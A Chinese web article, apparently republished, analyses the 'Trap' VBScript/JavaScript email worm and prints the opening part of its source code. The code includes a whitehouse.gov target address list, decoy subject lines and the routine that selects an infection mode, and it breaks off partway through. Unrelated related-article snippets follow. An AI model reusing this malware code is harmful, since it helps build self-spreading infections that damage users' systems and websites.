“陷阱”病毒源代码大揭密

2023-11-01

7月初在我国出现了一种名叫“陷阱”（Trap）的新型恶性病毒，并在7月5日全面爆发，目前国内已有不少的网站和用户遭受“陷阱”的袭击，造成网络系统瘫痪、文件丟失现象严重。该病毒是一种网络脚本语言病毒，并是同时使用了VBScript 和 JavaScript 两种脚本语言编写的，通过OutLook电子邮件传播（不打开邮件也能被感染）、感染文件传播，传播能力较强，并能直接攻击Microsoft IIS 服务器主页文件，造成网站感染，被病毒感染的网站如有用户来访问时，同时被感染。从病毒的攻击对象来看，“陷阱”很可能是“国产”病毒，但据了解该病毒其实在6月份就首先在韩国出现。

本人非常不幸也遭遇“陷阱”的袭击，造成7月5日计算机蓝屏，于是我研究了“陷阱”的源代码，经过一番努力终于揭清了代码原理，下面就对“陷阱”的发作过程和源代码作详细的揭密。
病毒具有自身加密能力(使用 JavaScript 编码技术)，使得普通用户无法看到病毒原码，但在被感染 VBS 文件中并没有加密，于是作为一个入口点，我非常轻松地得到所有源码。

'@ thank you! make use of other person to get rid of an enemy, trap _2001

'这句话的意思可能是“借刀杀人”，然后是病毒名称“陷阱”

on error resume next

dim vbscr, fso,w1,w2,MSWKEY,HCUW,Code_Str, Vbs_Str, Js_Str

dim defpath, smailc, MAX_SIZE

dim whb(), title(10)

smailc = 4

Redim whb(smailc) ’白宫相关人员邮件名单

whb(0) = "president@whitehouse.gov"

whb(1) = "vice.president@whitehouse.gov "

whb(2) = "first.lady@whitehouse.gov"

whb(3) = "mrs.cheney@whitehouse.gov"

'发送邮件的主題

title(0) = "Thanks for helping me!"

title(1) = "The police are investigating the robbery"

title(2) = "an application for a job "

title(3) = "The aspects of an application process pertinent to OSI"

title(4) = "What a pleasant weather. Why not go out for a walk?"

title(5) = "These countries have gone / been through too many wars"

title(6) = "We've fixed on the 17th of April for the wedding"

title(7) = "The wind failed and the sea returned to calmness."

title(8) = "the sitting is open!"

title(9) = ""

defpath = "C:/Readme.html" ' 病毒文件

MAX_SIZE = 100000 ' 定义传染文件的最大尺寸

MSWKEY = "HKEY_LOCAL_MACHINE/SoftWare/Microsoft/Windows/"

HCUW = "HKEY_CURRENT_USER/Software/Microsoft/WAB/"

main

sub main() '主程序

on error resume next

dim w_s

w_s= WScript.ScriptFullName '得到病毒文件本身的路径

if w_s = "" then

Err.Clear

set fso = CreateObject("Scripting.FileSystemObject") '创建文件系统对象

if getErr then '辨认病毒状态

Randomize '初始化隨机种子

ra = int(rnd() * 7) '产生隨机数

doucment.write title(ra) ' 写隨机内容

ExecuteMail '执行邮件状态时的程序

else

ExecutePage '执行 WEB 页状态时的程序

end if

else

ExecuteVbs '执行 VBS 文件状态时的程序

end if

end sub

Function getErr() 忽略错误

if Err.number<>0 then

getErr=true

Err.Clear

else

getErr=false

end if

end function

sub ExecutePage() '

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

“陷阱”病毒源代码大揭密的相关文章

三个JS，给纹理添加镜面反射（光泽）

我有一个纹理应用于 Three js 中的对象我想为其添加一些镜面反射或光泽我看到这样的例子 new THREE MeshPhongMaterial color 0x996633 specular 0x050505 shininess
使用 Ajax Jquery post 请求进行 Json 劫持

昨天我读了一些关于如何预防的好文章使用 Asp Net MVC 进行 Json 劫持 http haacked com archive 2009 06 24 json hijacking aspx 规则是永远不要通过 get 请求发送
有没有办法动态更改 jqGrid 的单元格值？

这个问题可能已经被问过很多次了但我想知道是否可以动态更改 jqgrid 的单元格值我基本上有一个网格它通过 JSON 字符串加载数据在特定列的某些行上该值可能为 null 因此预先知道哪个行 ID 是一个问题然后能够将 nul
JavaScript 字符串中的脚本标签[重复]

这个问题在这里已经有答案了我遇到一个问题即 JavaScript 中带引号的字符串内有结束脚本标记并且它正在杀死脚本我认为这不是预期的行为可以在这里看到这样的示例 http jsbin com oqepe edit http js
如何从文件中获取整个函数

好的我现在正在逐行阅读一个文件我知道文件中的每个函数名称因为它是在 XML 文档中的其他位置定义的应该是这样的 function function name 其中 function name 是函数的名称我从 XML 文档中获取所
有没有一种方法可以在没有输入的情况下发送表单值

假设我有以下表格
Apache Thrift Java-Javascript 通信

我正在编写一个基于 Apache Thrift 的 Java 服务器它将从 Javascript 客户端接收数据我已经完成了 Java 服务器但问题是我可以获得 Javascript 客户端的工作示例我无法找到一个好的示例构建文档
如何通过setTimeout函数定期打印数字？

var i 0 function counter for i i lt 100 i setTimeout gt console log i 2000 counter 我想以 2 秒的间隔打印 i 但它立即打印每次打印调用只需要几微秒为什
.points 不透明度/大小在三个.js 内

我回来回答有关 points 的第二个问题这次想知道如何将不透明度从 0 更改为 1 然后又回到距发射器的特定像素距离内 var particleCount 14 particles new THREE Geometry pMateria
jQuery：将文本区域滚动到给定位置

我有一个包含很多文本的文本区域
AngularJS + jQuery 移动

是否还有其他可能性来设计AngularJS以移动友好的方式应用程序CSS 我正在计划一个移动应用程序并希望使用 AngularJS 进行逻辑和数据绑定但我不想自己设计所有内容CSS The AngularJSFAQ说它使用jQuery
Chrome --app 相当于 Firefox\IE

我有一个网络应用程序客户要求单击不同按钮时更改浏览器窗口大小我发现在那link https stackoverflow com questions 13436855 launch google chrome from the comma
Angular2：动态同步http请求

Goal 发出一系列同步 http 请求并能够将它们作为一个可观察流进行订阅示例不工作 let query arr test1 test2 test3 function make request query arr if query a
从字节数组设置 img src

我需要设置img src我在对象中拥有的字节数组的属性 img
node.js 模块/导出系统：是否可以将模块导出为函数

我想在 Dispatch js 中做这样的事情 function handle msg exports handle 这在调用index js中 var dispatch require Dispatch dispatch data 有任何
Svelte 条件元素类报告为语法错误

我正在做一个if块每if 块的精简指南 https svelte technology guide if blocks 这看起来很简单但 Svelte 认为这是一个语法错误 svelte plugin ParseError Unexpec
从网页运行 ClickOnce 应用程序，无需用户操作

我们有一个基于 Java 的 Web 应用程序以及用 C 编写的相同应用程序如果 java 检查器发现客户端计算机上没有安装 Java 则应该运行该应用程序这个想法是运行 C 单击一次 http en wikipedia org wik
Firebase + Node.js：错误：找不到 XMLHttpRequest 兼容性库

Firebase Node js On iOS 安装的 Node js npm 安装 firebase save 节点测试 js 其中 test js 是一个非常简单的连接到 Firebase 的脚本 var firebase requir
如何跨多个文件跨越 javascript 命名空间？

我永远忽略了javascript 几年前我开始使用 jQuery 这样我就可以过得去但随着我开始更多地进行 TDD 我昨天决定真正深入研究 javascript 之后可能还有咖啡脚本在我的 ASP NET Web 窗体应用程序中我有很
为什么 JavaScript 中是 [1,2] + [3,4] = "1,23,4" ？

我想将一个数组的元素添加到另一个数组中所以我尝试了以下方法 1 2 3 4 它的回应是 1 23 4 到底是怎么回事 The 操作员没有为数组定义发生的事情是 JavaScript将数组转换为字符串并将它们连接起来 Update 由于这

随机推荐

MySQL 表分区报错：Table has no partition for value XXX

2019独角兽企业重金招聘Python工程师标准 gt gt gt 对已存在的未分区的表进行分区 alter table test PARTITION BY RANGE id PARTITION p1 VALUES LESS THAN 10
扫码点餐软件，打造智慧餐厅新体验！【点餐小程序】

随着科技的不断发展扫码点餐软件成为了越来越多餐厅的选择它们可以帮助顾客快速方便地点餐同时也带来了更高效的服务体验和更好的管理效果在这篇文章中我们将探讨如何通过扫码点餐软件打造智慧餐厅新体验并且以一个具体的案例来解析其中的技巧步
10-6 计算时间差

时间差可以用来衡量程序运行效率计算其有三种方法一是使用 difftime 函数二是使用自定义的 TimeInMillisecond 函数三是使用 clock 函数 1 使用 difftime 函数计算秒级时间差三种方法本质相同都
iTerm2使用笔记

鼠标设置在less vim中等使用滚轮在高级设置里面设置系统编辑方式让写命令和在其他编辑器中一致比如alt delete 删除一个word vim vimrc中设置系统clipboard set clipboard unnamed
机器人学习--卡尔曼滤波及各种滤波解析

什么是滤波举个最直观的简单例子臭水沟里舀一大勺水需要过滤成干净水怎么办用滤网网孔可根据需要选择大小孔过滤在电路方面波形的高低通滤波原理类似图像上的噪声点各种中值滤波等类似的滤波方案 Filter 在状态测量领域是根据预测
webpack 和 ts 简单配置及使用

如何使用webpack 与 ts结合使用新建项目执行项目初始化 npm init y 会生成 name tsdemo01 version 1 0 0 description main index js scripts test echo
Notion 的插件介绍和使用

十分推荐 Save to Notion Notion Web Clipper notion 官方的剪藏插件插件安装 Chrome 商店 https chrome google com webstore detail notion web
看完这篇教你玩转渗透测试靶机vulnhub——DC8

Vulnhub靶机DC8渗透测试详解 Vulnhub靶机介绍 Vulnhub靶机下载 Vulnhub靶机安装 Vulnhub靶机漏洞详解信息收集暴力破解提权获取flag Vulnhub靶机渗透总结 Vulnhub靶机介绍 vulnh
keil仿真调试报错

问题程序能正常下载但是keil仿真调试报错进入仿真程序就在全速运行了此时什么都干不了查看command窗口日志信息会发现有报错 jlink error cpu is not halted 然后点击reset按钮会退出全速仿真所有
一个自己用的opencv历程

include
设两个栈(stack1,stack2)共享一个一维数组空间s[m]，怎么最大限度地利用数组空间

可以利用扩充栈操作在传统的双端栈中两个栈之间存在一种制约关系两个栈中的元素总数最大可以达到M 如果一个栈中的元素较多那么另一个栈中的元素就较少两个栈中的元素总和超不过M 它主要利用了栈的栈底位置不变而栈顶位置动态变化的特性
jquery 读取解析四级的xml文件案例

答案 jQuery 可以很容易地使用 AJAX 技术来解析 XML 文件下面是一个案例 ajax type GET url yourXMLFile xml dataType xml success function xml xml fin
python day55

今日内容如何写一个测试脚本创建一个test py文件 from django test import TestCase Create your tests here import os if name main os environ s
unity shader中的矩阵变换知识

提要在图形的计算中比如旋转缩放平移投影等操作矩阵都扮演着极其重要的角色它是操作图元的基本工具虽然很多的图形API已经封装好了这些矩阵操作但是理解这些矩阵操作的原理会非常非常有帮助比如说我们可以通过一些矩阵的快捷计算来加速
Windows下切换进程用户名为当前用户名，而不是SYSTEM

在windows操作系统中某些情况下我们需要将程序以管理员身份启动通过任务管理器我们可以看到程序的持有者如下图所示使用SYSYTEM权限启动的程序理论是不可以访问到当前用户下的部分目录这个时候我们可以在必要时候切换成武到当前用
HTML+CSS项目案例

文章目录 1 表格练习 2 文本样式练习 3 图片标签练习 4 盒子模型练习一 5 盒子模型练习二 6 盒子模型练习三 7 浮动练习 8 边框练习一 9 边框练习二 10 图文混排 11 列表练习 1 表格练习案例演示 table tr
[数据库与软件工程]三、关系运算（并、交、笛卡尔积，自然连接等）

目录一前言二简单的关系运算并交差并 Union 交 Intersection 差三复杂的关系运算笛卡尔积自然连接一笛卡尔积的数学定义二关系运算中的笛卡尔积 1 笛卡尔积是什么 2 如果两个关系有同名属性怎么计
2023华为od机试统一考试B卷【增强字符串】

前言本题使用的Java语言如果需要python语言请参考以下链接 python版本题解题目描述请你实现一个增强版的strstr函数他的功能是使用带有可选段的字符串进行模糊查询与strstr函数相同该函数在源字符串中查找第一次
数组实现动态的原理

重新申请一个二倍大小的数组然后拷贝过去
“陷阱”病毒源代码大揭密

7月初在我国出现了一种名叫陷阱 Trap 的新型恶性病毒并在7月5日全面爆发目前国内已有不少的网站和用户遭受陷阱的袭击造成网络系统瘫痪文件丟失现象严重该病毒是一种网络脚本语言病毒并是同时使用了VBScript 和 Java

“陷阱”病毒源代码大揭密

“陷阱”病毒源代码大揭密 的相关文章

随机推荐

热门标签

“陷阱”病毒源代码大揭密的相关文章